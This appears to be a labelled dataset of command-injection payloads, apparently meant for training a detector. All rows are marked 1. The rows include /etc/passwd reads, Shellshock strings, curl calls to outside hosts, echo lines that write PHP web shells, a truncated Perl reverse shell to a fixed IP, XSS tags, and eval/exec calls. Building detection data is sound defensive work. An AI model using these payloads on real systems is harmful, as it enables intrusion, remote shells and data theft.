sentence
string
Label
int64
system('cat /etc/passwd');
1
<?php system("cat /etc/passwd");?>
1
`
1
||
1
|
1
;
1
'
1
'"
1
'
1
&
1
&&
1
%0a
1
%0a%0d
1
null
1
%0Aid
1
%0a id %0a
1
%0Aid%0A
1
%0a ping -i 30 127.0.0.1 %0a
1
%0A/usr/bin/id
1
%0A/usr/bin/id%0A
1
%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
1
%20{${phpinfo()}}
1
%20{${sleep(20)}}
1
%20{${sleep(3)}}
1
a|id|
1
a;id|
1
a;id;
1
a;id\n
1
() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12
1
| curl http://crowdshield.com/.testing/rce.txt
1
& curl http://crowdshield.com/.testing/rce.txt
1
; curl https://crowdshield.com/.testing/rce_vuln.txt
1
&& curl https://crowdshield.com/.testing/rce_vuln.txt
1
curl https://crowdshield.com/.testing/rce_vuln.txt
1
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
1
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
1
$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
1
dir
1
| dir
1
; dir
1
$(`dir`)
1
& dir
1
&&dir
1
&& dir
1
| dir C:\
1
; dir C:\
1
& dir C:\
1
&& dir C:\
1
dir C:\
1
| dir C:\Documents and Settings\*
1
; dir C:\Documents and Settings\*
1
& dir C:\Documents and Settings\*
1
&& dir C:\Documents and Settings\*
1
dir C:\Documents and Settings\*
1
| dir C:\Users
1
; dir C:\Users
1
& dir C:\Users
1
&& dir C:\Users
1
dir C:\Users
1
;echo%20'<script>alert(1)</script>'
1
echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX
1
| echo "<?php include($_GET['page'])| ?>" > rfi.php
1
; echo "<?php include($_GET['page']); ?>" > rfi.php
1
& echo "<?php include($_GET['page']); ?>" > rfi.php
1
&& echo "<?php include($_GET['page']); ?>" > rfi.php
1
echo "<?php include($_GET['page']); ?>" > rfi.php
1
| echo "<?php system('dir $_GET['dir']')| ?>" > dir.php
1
; echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
1
& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
1
&& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
1
echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
1
| echo "<?php system($_GET['cmd'])| ?>" > cmd.php
1
; echo "<?php system($_GET['cmd']); ?>" > cmd.php
1
& echo "<?php system($_GET['cmd']); ?>" > cmd.php
1
&& echo "<?php system($_GET['cmd']); ?>" > cmd.php
1
echo "<?php system($_GET['cmd']); ?>" > cmd.php
1
;echo '<script>alert(1)</script>'
1
echo '<script>alert(1)</script>'// XXXXXXXXXXX
1
echo '<script src=https://crowdshield.com/.testing/xss.js></script>'// XXXXXXXXXXX
1
| echo "use Socket;$i="192.168.16.151";$p=443;socket(S
1
; echo "use Socket;$i="192.168.16.151";$p=443;socket(S
1
& echo "use Socket;$i="192.168.16.151";$p=443;socket(S
1
&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S
1
echo "use Socket;$i="192.168.16.151";$p=443;socket(S
1
() { :;}; echo vulnerable 10
1
eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
1
eval('ls')
1
eval('pwd')
1
eval('pwd');
1
eval('sleep 5')
1
eval('sleep 5');
1
eval('whoami')
1
eval('whoami');
1
exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
1
exec('ls')
1
exec('pwd')
1
exec('pwd');
1
exec('sleep 5')
1
exec('sleep 5');
1
exec('whoami')
1